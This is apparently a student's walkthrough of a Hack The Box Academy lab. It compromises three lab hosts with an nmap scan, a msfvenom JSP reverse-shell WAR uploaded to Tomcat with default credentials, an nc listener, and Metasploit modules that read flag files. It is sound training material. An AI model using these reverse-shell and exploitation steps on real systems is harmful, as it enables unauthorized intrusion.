# The Live Engagement

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FL3cnOoSuQhYCAliBsQlO%2Fimage.png?alt=media&#x26;token=d22921bd-d0b3-418a-afa2-a3e67ccda604" alt=""><figcaption></figcaption></figure>

First we have to login into the ip that was given

```
RDP to 10.129.86.5 with user "htb-student" and password "HTB_@cademy_stdnt!"
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FmxEeCtETAONLTHDPiAWE%2Fimage.png?alt=media&#x26;token=a44dab60-d390-4382-b098-cfddbe3ec2cc" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2Fl7rNkYsDing0oMibzdOF%2Fimage.png?alt=media&#x26;token=1854e88a-3803-4bef-aaa8-c92b0833570b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FqCthZ6eFrDn31c2jO57n%2Fimage.png?alt=media&#x26;token=a8da5508-b0b3-48db-aa97-0de54320ad2e" alt=""><figcaption></figcaption></figure>

First we have to nmap scan the first host which is the 172.16.1.11

```
# Nmap 7.92 scan initiated Tue Apr 30 02:56:03 2024 as: nmap -sC -sV -oN firsthost.nmap 172.16.1.11
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.026s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds
515/tcp  open  printer       Microsoft lpd
1801/tcp open  msmq?
2103/tcp open  msrpc         Microsoft Windows RPC
2105/tcp open  msrpc         Microsoft Windows RPC
2107/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2024-04-29T06:08:54
|_Not valid after:  2024-10-29T06:08:54
|_ssl-date: 2024-04-30T06:57:03+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: SHELLS-WINSVR
|   NetBIOS_Domain_Name: SHELLS-WINSVR
|   NetBIOS_Computer_Name: SHELLS-WINSVR
|   DNS_Domain_Name: shells-winsvr
|   DNS_Computer_Name: shells-winsvr
|   Product_Version: 10.0.17763
|_  System_Time: 2024-04-30T06:56:57+00:00
8080/tcp open  http          Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/10.0.11
|_http-favicon: Apache Tomcat
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: shells-winsvr
|   NetBIOS computer name: SHELLS-WINSVR\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-04-29T23:56:57-07:00
| smb2-time: 
|   date: 2024-04-30T06:56:57
|_  start_date: N/A
|_clock-skew: mean: 1h23m59s, deviation: 3h07m49s, median: -1s
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:17:44 (VMware)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 30 02:57:03 2024 -- 1 IP address (1 host up) scanned in 59.90 seconds
```

Then we will seach for exploit for the web server tomcat

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FzbwJqymEyHD6B8mJZSNr%2Fimage.png?alt=media&#x26;token=3a904901-33e0-4f84-8fc1-d100707f13b4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F7YTehj38uNDCHpL1uexq%2Fimage.png?alt=media&#x26;token=f65c90c1-5616-483f-826d-dc4d8d9b4aae" alt=""><figcaption></figcaption></figure>

But it failed

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FG8NAofsrD8zs6fTMsYzn%2Fimage.png?alt=media&#x26;token=0b93a1ad-b9d3-4bff-986e-284dbebb0db1" alt=""><figcaption></figcaption></figure>

It tried both the IP but still failed

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F1TpQCRPIi7cVZ6kzTn85%2Fimage.png?alt=media&#x26;token=73f49897-1eab-46ad-abe3-8fd7b0227693" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FoFHfWvOsyXpb4ZdWpHOz%2Fimage.png?alt=media&#x26;token=86357838-51f4-4a67-b0d7-4b45f7ac73b4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FkZa1BRaEadjuLXZQ0pr1%2Fimage.png?alt=media&#x26;token=433c35dc-f6b6-4243-9923-8093934c5334" alt=""><figcaption></figcaption></figure>

Then we are going to change the payload for the exploit

```
msfvenom -l payloads | grep java
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FjAPyWkg8126KIfF6HoMG%2Fimage.png?alt=media&#x26;token=c41d2edb-b580-4f94-90b2-f795a91b6ecd" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9001 -f war -o shell.war
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FJGcOioAsQb0mwYoQUVI0%2Fimage.png?alt=media&#x26;token=3623a59f-222e-426b-ad8b-ba073b41810a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FDdArNYnHQdoVf0FDyaum%2Fimage.png?alt=media&#x26;token=1ab2eba0-4a1c-4394-a661-811800b7e462" alt=""><figcaption></figcaption></figure>

Click the Manager App

```
User - tomcat
Pass - Tomcatadm
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FGgdQ0Zl5xHjK0M1iICqi%2Fimage.png?alt=media&#x26;token=5d20c31b-a149-4cd6-8136-edc72f54c34c" alt=""><figcaption></figcaption></figure>

Upload a war file&#x20;

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FoKzGGBqEcFfVXj8fZfqX%2Fimage.png?alt=media&#x26;token=1e826e00-a055-4899-909f-7e288c67ffa7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FeMsfpjbICdvlrr9ASSQW%2Fimage.png?alt=media&#x26;token=cf7cc265-a598-4b71-b464-67a5e3391904" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F10h3gTU2Z5wXDAaNRaXy%2Fimage.png?alt=media&#x26;token=d06a264b-8b57-4ec9-aea2-5f60e0c4be35" alt=""><figcaption></figcaption></figure>

After several to upload the war reverse shell it became successful

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F89Jh1TTkgv8dWHRSloS5%2Fimage.png?alt=media&#x26;token=9173cadb-c2a1-4ccd-91a4-3091cc7d9469" alt=""><figcaption></figcaption></figure>

Set up a listener and go access the shell

```
nc -lnvp 9001
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FpEbDco6fmH6F0gBCrSSq%2Fimage.png?alt=media&#x26;token=c71b3854-1e9b-4cb6-9b7d-67d0dc56fc37" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FQJUdl2MGpfNcxnJBmGNd%2Fimage.png?alt=media&#x26;token=1485e9d0-0d60-4dd9-8937-00c18cc870c9" alt=""><figcaption></figcaption></figure>

* **Second host - 172.16.1.12 or blog.inlanefrieght.local**

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FqAnvyeu6cBN8Zrqtc76B%2Fimage.png?alt=media&#x26;token=d7dbeae3-be89-438a-883e-4f75dc46133c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FfFowzwWNv5zGBs4irTXo%2Fimage.png?alt=media&#x26;token=15323eeb-74c4-41b9-9613-f854618d9a14" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FLRC90aOXhL1o7pPvLj50%2Fimage.png?alt=media&#x26;token=8d9f67de-8bb0-4b9c-9011-d4d0b383d3b1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FaWI7dFtYwsK5EV0qMpA9%2Fimage.png?alt=media&#x26;token=c6b8c4fa-98b5-4816-b41c-f3f287c3d797" alt=""><figcaption></figcaption></figure>

Use reload\_all to refresh the modules in msfconsole

```
reload_all
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FmqE5PwSq4ff8OL555MTh%2Fimage.png?alt=media&#x26;token=78307f25-7302-41d2-af71-c4ff0691f750" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FjrusW7l5vwxaGPw9M6V7%2Fimage.png?alt=media&#x26;token=cf8c52c9-081a-41e8-a457-341adb4f82c1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FulRIpbHUQP1w7QS2bjPt%2Fimage.png?alt=media&#x26;token=86119d03-b391-4d23-9f48-2c6d6157242f" alt=""><figcaption></figcaption></figure>

```
run 
shell
cat /customscripts/flag.txt
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FzzkZAOuTEkmG4hq6qUwo%2Fimage.png?alt=media&#x26;token=3e6af6a2-c552-427d-826e-c900d2163379" alt=""><figcaption></figcaption></figure>

* **Third host - 172.16.1.13**

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FfDpHjdGWPZW7lQ8u56fq%2Fimage.png?alt=media&#x26;token=327e17f7-f488-4adb-8a0e-19401595f82e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FFYPzIWVcN0X4NK1LKbhU%2Fimage.png?alt=media&#x26;token=fff0e021-4ad9-4d07-a3d8-4e3945f590d1" alt=""><figcaption></figcaption></figure>

```
use 1
options
set rhost 172.16.1.13
set lhost 172.16.1.5
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FJN66Z4qKweDLQtQIKpy1%2Fimage.png?alt=media&#x26;token=1dc0f7de-338d-4491-a0f7-61df57133ee7" alt=""><figcaption></figcaption></figure>

```
run
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FE5KInrra34LhGyD9DbZB%2Fimage.png?alt=media&#x26;token=88ddc81b-284f-45d4-97ad-006297ea3fd6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FiVtAShpVQsYhDxXzhfJO%2Fimage.png?alt=media&#x26;token=6e692416-eeb6-47a5-9f8f-0f2f8964a491" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FHZrKuEmimCGOD1Z48HpO%2Fimage.png?alt=media&#x26;token=4eb6fbf5-375d-4b99-ab87-56c13714910a" alt=""><figcaption></figcaption></figure>
